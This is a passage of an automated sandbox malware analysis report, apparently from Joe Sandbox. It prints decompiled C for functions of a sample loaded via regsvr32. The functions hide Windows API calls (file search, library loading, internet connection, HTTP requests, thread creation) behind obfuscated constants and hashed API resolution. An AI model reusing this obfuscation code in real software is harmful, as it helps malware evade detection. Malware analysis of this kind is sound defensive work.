                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileInternetRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 778332206-0
                                                                                                            • Opcode ID: c5341cbd7942fee7171f7f036385ae2e4400032920e173bae6409882a82237d7
                                                                                                            • Instruction ID: 9fb5147e6957db92ad8c3796af1b16049ef442f53ab535df9a7880c39ee933fe
                                                                                                            • Opcode Fuzzy Hash: c5341cbd7942fee7171f7f036385ae2e4400032920e173bae6409882a82237d7
                                                                                                            • Instruction Fuzzy Hash: B0112376D00208FBDF05DFA5D94A8CEBFB5EF14344F208089E914A6261D3769B64EF94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04D31B61 Relevance: 1.5, APIs: 1, Instructions: 46fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 80%
                                                                                                            			E04D31B61(WCHAR* __ecx, struct _WIN32_FIND_DATAW* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				unsigned int _v12;
				signed int _v16;
				void* _t32;
				void* _t39;
				WCHAR* _t42;
				struct _WIN32_FIND_DATAW* _t43;

				_push(_a8);
				_t43 = __edx;
				_t42 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04D432C4(_t32);
				_v16 = 0x3f5f1;
				_v12 = 0x415084;
				_v12 = _v12 << 0xb;
				_v12 = _v12 << 0xa;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0x084deb50;
				_v8 = 0x4dd0ea;
				_v8 = _v8 + 0xfffff8f5;
				_v8 = _v8 + 0xffff22bb;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00074bdf;
				_v16 = 0xd4793;
				_v16 = _v16 + 0x7792;
				_v16 = _v16 * 0x35;
				_v16 = _v16 ^ 0x02dab258;
				E04D352F2(__ecx, __edx, __ecx, 0x216, 0x884e48ad, 0x9f49d153);
				_t39 = FindFirstFileW(_t42, _t43); // executed
				return _t39;
			}










                                                                                                            0x04d31b69
                                                                                                            0x04d31b6c
                                                                                                            0x04d31b6e
                                                                                                            0x04d31b70
                                                                                                            0x04d31b73
                                                                                                            0x04d31b74
                                                                                                            0x04d31b75
                                                                                                            0x04d31b7a
                                                                                                            0x04d31b84
                                                                                                            0x04d31b8b
                                                                                                            0x04d31b8f
                                                                                                            0x04d31b93
                                                                                                            0x04d31b96
                                                                                                            0x04d31b9d
                                                                                                            0x04d31ba4
                                                                                                            0x04d31bab
                                                                                                            0x04d31bb2
                                                                                                            0x04d31bb6
                                                                                                            0x04d31bbd
                                                                                                            0x04d31bc4
                                                                                                            0x04d31bdf
                                                                                                            0x04d31be2
                                                                                                            0x04d31bf2
                                                                                                            0x04d31bfc
                                                                                                            0x04d31c03

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFindFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 1974802433-0
                                                                                                            • Opcode ID: 7f6c96832dda2bbd7389ceacf7463157c0045872c9de874a8099776866ce469c
                                                                                                            • Instruction ID: 8e2a05505ba79a35f072aa121460a79facf81b3ff597024b1f4d0ba7bd698523
                                                                                                            • Opcode Fuzzy Hash: 7f6c96832dda2bbd7389ceacf7463157c0045872c9de874a8099776866ce469c
                                                                                                            • Instruction Fuzzy Hash: 96111572D01608FBCB01DE99D8498DEBFB4EB54758F10C1DAE828A7250D3B85B55DF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04D4F6A1 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42libraryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 642 4d4f6a1-4d4f745 call 4d432c4 call 4d352f2 LoadLibraryW
                                                                                                            C-Code - Quality: 75%
                                                                                                            			E04D4F6A1(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t31;
				struct HINSTANCE__* _t37;
				WCHAR* _t40;

				_push(_a12);
				_t40 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04D432C4(_t31);
				_v28 = 0xc52aa;
				_v24 = 0x95615;
				_v20 = 0x738ab;
				_v16 = 0x613b6f;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x0c263f45;
				_v8 = 0x987e64;
				_v8 = _v8 + 0xffff93dc;
				_v8 = _v8 >> 5;
				_v8 = _v8 + 0x46a8;
				_v8 = _v8 ^ 0x00098c86;
				_v12 = 0x302d8a;
				_v12 = _v12 << 0xe;
				_v12 = _v12 | 0xe7847ef7;
				_v12 = _v12 ^ 0xefed21e1;
				E04D352F2(__ecx, __edx, __ecx, 0xa2, 0xef13742b, 0x9f49d153);
				_t37 = LoadLibraryW(_t40); // executed
				return _t37;
			}












                                                                                                            0x04d4f6a8
                                                                                                            0x04d4f6ab
                                                                                                            0x04d4f6ad
                                                                                                            0x04d4f6b0
                                                                                                            0x04d4f6b3
                                                                                                            0x04d4f6b4
                                                                                                            0x04d4f6b5
                                                                                                            0x04d4f6ba
                                                                                                            0x04d4f6c4
                                                                                                            0x04d4f6cb
                                                                                                            0x04d4f6d2
                                                                                                            0x04d4f6d9
                                                                                                            0x04d4f6dd
                                                                                                            0x04d4f6e4
                                                                                                            0x04d4f6eb
                                                                                                            0x04d4f6f2
                                                                                                            0x04d4f6f6
                                                                                                            0x04d4f6fd
                                                                                                            0x04d4f704
                                                                                                            0x04d4f70b
                                                                                                            0x04d4f70f
                                                                                                            0x04d4f716
                                                                                                            0x04d4f736
                                                                                                            0x04d4f73f
                                                                                                            0x04d4f745

                                                                                                            APIs
                                                                                                            • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 04D4F73F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID: o;a$!$CJD
                                                                                                            • API String ID: 1029625771-3784180784
                                                                                                            • Opcode ID: 150cdb39f3a0c76e5251988e351099073ad544735b10fe3a062043cf48863455
                                                                                                            • Instruction ID: 5ebfe2cc97397ff0b03a5117f3b7fbbf9532ab30ed186f1ce37406860407968c
                                                                                                            • Opcode Fuzzy Hash: 150cdb39f3a0c76e5251988e351099073ad544735b10fe3a062043cf48863455
                                                                                                            • Instruction Fuzzy Hash: 311112B6D01308BBCB01EFA8C80988EBBB4EB10318F508088E91566251E3B99B54DF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04D48B54 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 771 4d48b54-4d48c02 call 4d432c4 call 4d352f2 FindClose
                                                                                                            C-Code - Quality: 89%
                                                                                                            			E04D48B54(void* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				void* _t41;
				int _t52;
				signed int _t54;
				signed int _t55;

				_push(_a8);
				_push(_a4);
				E04D432C4(_t41);
				_v20 = _v20 & 0x00000000;
				_v24 = 0x72df4;
				_v8 = 0x42e349;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 + 0xffff20e0;
				_t54 = 0x77;
				_v8 = _v8 * 0x34;
				_v8 = _v8 ^ 0xffdf8f4b;
				_v16 = 0x3969b0;
				_t55 = 0x67;
				_v16 = _v16 / _t54;
				_v16 = _v16 / _t55;
				_v16 = _v16 ^ 0x000710ec;
				_v12 = 0x8869f2;
				_v12 = _v12 ^ 0x55ad3f7d;
				_v12 = _v12 | 0x60fec989;
				_v12 = _v12 ^ 0x75f884ef;
				E04D352F2(_t55, _v16 % _t55, _t55, 0x1de, 0xd9d5df36, 0x9f49d153);
				_t52 = FindClose(_a8); // executed
				return _t52;
			}












                                                                                                            0x04d48b5a
                                                                                                            0x04d48b5d
                                                                                                            0x04d48b62
                                                                                                            0x04d48b67
                                                                                                            0x04d48b6e
                                                                                                            0x04d48b77
                                                                                                            0x04d48b7e
                                                                                                            0x04d48b82
                                                                                                            0x04d48b8f
                                                                                                            0x04d48b92
                                                                                                            0x04d48b95
                                                                                                            0x04d48b9c
                                                                                                            0x04d48ba8
                                                                                                            0x04d48ba9
                                                                                                            0x04d48bb8
                                                                                                            0x04d48bbb
                                                                                                            0x04d48bc2
                                                                                                            0x04d48bc9
                                                                                                            0x04d48bd0
                                                                                                            0x04d48bd7
                                                                                                            0x04d48bf2
                                                                                                            0x04d48bfd
                                                                                                            0x04d48c02

                                                                                                            APIs
                                                                                                            • FindClose.KERNEL32(000710EC), ref: 04D48BFD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFind
                                                                                                            • String ID: IB$i
                                                                                                            • API String ID: 1863332320-2104615138
                                                                                                            • Opcode ID: 4596798b6602728b799d3259544286cac836a557a45c9f8fc8221b302c17ffb0
                                                                                                            • Instruction ID: ba6c42c1af0f4c1662415f51c189c918e441bfb86fa0d922bb0f18c5cf9b10dc
                                                                                                            • Opcode Fuzzy Hash: 4596798b6602728b799d3259544286cac836a557a45c9f8fc8221b302c17ffb0
                                                                                                            • Instruction Fuzzy Hash: 5A113AB6E05208FBDB04EFE9D94699DFBB1EF40304F20C189E514A7250E7B55B149F84
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04D48A6A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 51%
                                                                                                            			E04D48A6A(long __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, WCHAR* _a28, intOrPtr _a36, void* _a44, unsigned int _a52) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t56;
				signed int _t59;
				long _t63;
				short _t64;

				_t64 = _a52;
				_push(0);
				_t63 = __ecx;
				_push(_t64 & 0x0000ffff);
				_push(0);
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E04D432C4(_t64 & 0x0000ffff);
				_v24 = 0x7c054;
				_v20 = 0x1ca5;
				_v16 = 0x3b063;
				_v8 = 0xba1fa2;
				_v8 = _v8 + 0xffffbbc8;
				_v8 = _v8 ^ 0xed56c626;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0xbc79396b;
				_a52 = 0x616d25;
				_a52 = _a52 ^ 0xd5649618;
				_a52 = _a52 >> 0xc;
				_a52 = _a52 + 0xffffe306;
				_a52 = _a52 ^ 0x00050871;
				_v12 = 0xfb4c31;
				_t59 = 0x7f;
				_v12 = _v12 / _t59;
				_v12 = _v12 | 0xb477662e;
				_v12 = _v12 ^ 0xb47687c7;
				E04D352F2(_t59, _v12 % _t59, _t59, 0xa9, 0x35b62607, 0xfd56727);
				_t56 = InternetConnectW(_a44, _a28, _t64, 0, 0, _t63, 0, 0); // executed
				return _t56;
			}












                                                                                                            0x04d48a72
                                                                                                            0x04d48a78
                                                                                                            0x04d48a7c
                                                                                                            0x04d48a7e
                                                                                                            0x04d48a7f
                                                                                                            0x04d48a80
                                                                                                            0x04d48a83
                                                                                                            0x04d48a84
                                                                                                            0x04d48a87
                                                                                                            0x04d48a88
                                                                                                            0x04d48a8b
                                                                                                            0x04d48a8e
                                                                                                            0x04d48a91
                                                                                                            0x04d48a94
                                                                                                            0x04d48a97
                                                                                                            0x04d48a9a
                                                                                                            0x04d48a9e
                                                                                                            0x04d48a9f
                                                                                                            0x04d48aa4
                                                                                                            0x04d48aae
                                                                                                            0x04d48ab7
                                                                                                            0x04d48abe
                                                                                                            0x04d48ac5
                                                                                                            0x04d48acc
                                                                                                            0x04d48ad3
                                                                                                            0x04d48ad7
                                                                                                            0x04d48ade
                                                                                                            0x04d48ae5
                                                                                                            0x04d48aec
                                                                                                            0x04d48af0
                                                                                                            0x04d48af7
                                                                                                            0x04d48afe
                                                                                                            0x04d48b0a
                                                                                                            0x04d48b12
                                                                                                            0x04d48b15
                                                                                                            0x04d48b1c
                                                                                                            0x04d48b37
                                                                                                            0x04d48b4b
                                                                                                            0x04d48b53

                                                                                                            APIs
                                                                                                            • InternetConnectW.WININET(?,?,?,00000000,00000000,?,00000000,00000000), ref: 04D48B4B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ConnectInternet
                                                                                                            • String ID: %ma
                                                                                                            • API String ID: 3050416762-723589437
                                                                                                            • Opcode ID: 5383d73b74ea1e0117a4218152230cce157a91d3f2fbedc2d579a65b31a39fbe
                                                                                                            • Instruction ID: 31554a02a267bfbbb4a3d32bf896c908778089128910615b40df0f4e349f20af
                                                                                                            • Opcode Fuzzy Hash: 5383d73b74ea1e0117a4218152230cce157a91d3f2fbedc2d579a65b31a39fbe
                                                                                                            • Instruction Fuzzy Hash: 302126B690020CBFEF45DE95DC85CEE7F79EB54798F504048F90562120C3759AA4DBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04D4B3A1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 39%
                                                                                                            			E04D4B3A1(void* __ecx, DWORD* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a36, WCHAR* _a40) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _v28;
				intOrPtr _v32;
				void* _t32;
				int _t41;
				DWORD* _t46;

				_t46 = __edx;
				_push(0);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(__edx);
				_push(0);
				E04D432C4(_t32);
				_v32 = 0xa2843;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v16 = 0x24f12a;
				_v16 = _v16 ^ 0xf34cd37c;
				_v16 = _v16 ^ 0xf36a1f11;
				_v12 = 0x881ebb;
				_v12 = _v12 * 0x3f;
				_v12 = _v12 + 0x496;
				_v12 = _v12 ^ 0x21781a87;
				_v8 = 0x6f5ef9;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 * 0x4d;
				_v8 = _v8 ^ 0x000cfc14;
				E04D352F2(__ecx, __edx, __ecx, 0x172, 0xf54564f2, 0x9f49d153);
				_t41 = GetVolumeInformationW(_a40, 0, 0, _t46, 0, 0, 0, 0); // executed
				return _t41;
			}











                                                                                                            0x04d4b3ac
                                                                                                            0x04d4b3ae
                                                                                                            0x04d4b3af
                                                                                                            0x04d4b3b2
                                                                                                            0x04d4b3b5
                                                                                                            0x04d4b3b6
                                                                                                            0x04d4b3b7
                                                                                                            0x04d4b3ba
                                                                                                            0x04d4b3bd
                                                                                                            0x04d4b3be
                                                                                                            0x04d4b3c1
                                                                                                            0x04d4b3c2
                                                                                                            0x04d4b3c5
                                                                                                            0x04d4b3c6
                                                                                                            0x04d4b3c7
                                                                                                            0x04d4b3cc
                                                                                                            0x04d4b3db
                                                                                                            0x04d4b3e1
                                                                                                            0x04d4b3ed
                                                                                                            0x04d4b3ee
                                                                                                            0x04d4b3f5
                                                                                                            0x04d4b3fc
                                                                                                            0x04d4b403
                                                                                                            0x04d4b40e
                                                                                                            0x04d4b411
                                                                                                            0x04d4b418
                                                                                                            0x04d4b41f
                                                                                                            0x04d4b426
                                                                                                            0x04d4b42e
                                                                                                            0x04d4b431
                                                                                                            0x04d4b441
                                                                                                            0x04d4b453
                                                                                                            0x04d4b45b

                                                                                                            APIs
                                                                                                            • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04D4B453
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InformationVolume
                                                                                                            • String ID: C(
                                                                                                            • API String ID: 2039140958-806726975
                                                                                                            • Opcode ID: e71f333ac6984e21a869638b68aa1375949e08e3d88665a223140ac073d4a287
                                                                                                            • Instruction ID: 560b90276fe18cc0ae2b3d45f8dc6959ddf5df1985a655c862d15bc01fa34861
                                                                                                            • Opcode Fuzzy Hash: e71f333ac6984e21a869638b68aa1375949e08e3d88665a223140ac073d4a287
                                                                                                            • Instruction Fuzzy Hash: 4B2113B190020CBFAF00DFE8CC858EFBBB9EB45398F118098F914A6121D3754E519B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04D42E17 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 46%
                                                                                                            			E04D42E17(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, WCHAR* _a32, intOrPtr _a40, long _a44, void* _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				void* _t41;
				void* _t49;
				signed int _t51;
				WCHAR* _t56;

				_t56 = __edx;
				_push(0);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(__edx);
				E04D432C4(_t41);
				_v24 = 0x2e02d;
				_v20 = 0;
				_v12 = 0x612363;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0xa96d4967;
				_v12 = _v12 ^ 0xa962ccc6;
				_v16 = 0xd5e350;
				_t51 = 0x24;
				_v16 = _v16 / _t51;
				_v16 = _v16 ^ 0x000eb4be;
				_v8 = 0x999eee;
				_v8 = _v8 + 0xffff4f27;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x8eeebf7c;
				E04D352F2(_t51, _v16 % _t51, _t51, 0xf3, 0xbc446173, 0xfd56727);
				_t49 = HttpOpenRequestW(_a48, _t56, _a32, 0, 0, 0, _a44, 0); // executed
				return _t49;
			}












                                                                                                            0x04d42e21
                                                                                                            0x04d42e23
                                                                                                            0x04d42e24
                                                                                                            0x04d42e27
                                                                                                            0x04d42e2a
                                                                                                            0x04d42e2d
                                                                                                            0x04d42e2e
                                                                                                            0x04d42e31
                                                                                                            0x04d42e32
                                                                                                            0x04d42e35
                                                                                                            0x04d42e38
                                                                                                            0x04d42e3b
                                                                                                            0x04d42e3e
                                                                                                            0x04d42e3f
                                                                                                            0x04d42e42
                                                                                                            0x04d42e44
                                                                                                            0x04d42e49
                                                                                                            0x04d42e53
                                                                                                            0x04d42e58
                                                                                                            0x04d42e5f
                                                                                                            0x04d42e63
                                                                                                            0x04d42e6a
                                                                                                            0x04d42e71
                                                                                                            0x04d42e7d
                                                                                                            0x04d42e85
                                                                                                            0x04d42e88
                                                                                                            0x04d42e8f
                                                                                                            0x04d42e96
                                                                                                            0x04d42e9d
                                                                                                            0x04d42ea1
                                                                                                            0x04d42ebc
                                                                                                            0x04d42ed2
                                                                                                            0x04d42ed9

                                                                                                            APIs
                                                                                                            • HttpOpenRequestW.WININET(?,?,?,00000000,00000000,00000000,?,00000000), ref: 04D42ED2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: HttpOpenRequest
                                                                                                            • String ID: c#a
                                                                                                            • API String ID: 1984915467-835488452
                                                                                                            • Opcode ID: 3fdfa86631890540a25b11f56de3f04caa32aa01d3697e5367734a1257b0e5e4
                                                                                                            • Instruction ID: 228c49cb1c021e7995a6f4958cf5b6b2d292d6fe1c46f2cf1b3ea30e63fc600e
                                                                                                            • Opcode Fuzzy Hash: 3fdfa86631890540a25b11f56de3f04caa32aa01d3697e5367734a1257b0e5e4
                                                                                                            • Instruction Fuzzy Hash: D021E572901248BBDF25DF96DD49CCFBFB5EF85714F108089F91462260C3769A60DBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04D4C56F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 80%
                                                                                                            			E04D4C56F(struct _WIN32_FIND_DATAW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t41;
				int _t53;
				signed int _t55;
				signed int _t56;
				struct _WIN32_FIND_DATAW* _t62;

				_push(_a12);
				_t62 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E04D432C4(_t41);
				_v20 = 0x30735;
				_v16 = 0x8440e;
				_v16 = 0x654a7d;
				_t55 = 0x61;
				_v16 = _v16 / _t55;
				_v16 = _v16 | 0x2d9bb191;
				_v16 = _v16 ^ 0x2d914966;
				_v8 = 0xff625a;
				_t56 = 0xc;
				_v8 = _v8 * 6;
				_v8 = _v8 + 0xdd3a;
				_v8 = _v8 * 0x19;
				_v8 = _v8 ^ 0x95bddad4;
				_v12 = 0x43acd8;
				_v12 = _v12 / _t56;
				_v12 = _v12 | 0x00319689;
				_v12 = _v12 ^ 0x0033b9cb;
				E04D352F2(_t56, _v12 % _t56, _t56, 0x3b, 0xae9ba2a6, 0x9f49d153);
				_t53 = FindNextFileW(_a12, _t62); // executed
				return _t53;
			}












                                                                                                            0x04d4c576
                                                                                                            0x04d4c579
                                                                                                            0x04d4c57b
                                                                                                            0x04d4c57e
                                                                                                            0x04d4c582
                                                                                                            0x04d4c583
                                                                                                            0x04d4c588
                                                                                                            0x04d4c592
                                                                                                            0x04d4c59b
                                                                                                            0x04d4c5a7
                                                                                                            0x04d4c5ac
                                                                                                            0x04d4c5b1
                                                                                                            0x04d4c5b8
                                                                                                            0x04d4c5bf
                                                                                                            0x04d4c5ca
                                                                                                            0x04d4c5d7
                                                                                                            0x04d4c5da
                                                                                                            0x04d4c5e6
                                                                                                            0x04d4c5e9
                                                                                                            0x04d4c5f0
                                                                                                            0x04d4c5fc
                                                                                                            0x04d4c5ff
                                                                                                            0x04d4c606
                                                                                                            0x04d4c616
                                                                                                            0x04d4c622
                                                                                                            0x04d4c628

                                                                                                            APIs
                                                                                                            • FindNextFileW.KERNELBASE(00030735,?,?,?,?,?,?,?,?,?,00000000), ref: 04D4C622
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFindNext
                                                                                                            • String ID: }Je
                                                                                                            • API String ID: 2029273394-2485522505
                                                                                                            • Opcode ID: 52e4fe87039520034ed7cb141ccb9f657951214b020a62a818a80c92f236f878
                                                                                                            • Instruction ID: 2129a641c1d0aba87080721382aaabcec251a094f3d740f2a83f33d79c89cbce
                                                                                                            • Opcode Fuzzy Hash: 52e4fe87039520034ed7cb141ccb9f657951214b020a62a818a80c92f236f878
                                                                                                            • Instruction Fuzzy Hash: 66111275E01208FBDB08DFA8C94A9DEBBB5EF84308F10C08AE514AB290D7B55B609F50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04D4C75F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 50%
                                                                                                            			E04D4C75F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, _Unknown_base(*)()* _a20, intOrPtr _a28, intOrPtr _a36, void* _a40) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t36;
				void* _t42;

				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(0);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E04D432C4(_t36);
				_v20 = 0xee8fa;
				_v16 = 0x7f72f;
				_v8 = 0xc6c601;
				_v8 = _v8 ^ 0x96666c5f;
				_v8 = _v8 ^ 0x5e433dc1;
				_v8 = _v8 | 0xf2f1b058;
				_v8 = _v8 ^ 0xfafb5737;
				_v12 = 0x6e7c29;
				_v12 = _v12 + 0xffffc27b;
				_v12 = _v12 ^ 0x85c33015;
				_v12 = _v12 ^ 0x85aebf57;
				_v16 = 0xeab111;
				_v16 = _v16 | 0x204fbcf6;
				_v16 = _v16 ^ 0x20e65893;
				E04D352F2(__ecx, __edx, __ecx, 0x92, 0xdd7144f, 0x9f49d153);
				_t42 = CreateThread(0, 0, _a20, _a40, 0, 0); // executed
				return _t42;
			}









                                                                                                            0x04d4c766
                                                                                                            0x04d4c76b
                                                                                                            0x04d4c76e
                                                                                                            0x04d4c76f
                                                                                                            0x04d4c772
                                                                                                            0x04d4c773
                                                                                                            0x04d4c776
                                                                                                            0x04d4c777
                                                                                                            0x04d4c77a
                                                                                                            0x04d4c77d
                                                                                                            0x04d4c780
                                                                                                            0x04d4c781
                                                                                                            0x04d4c782
                                                                                                            0x04d4c787
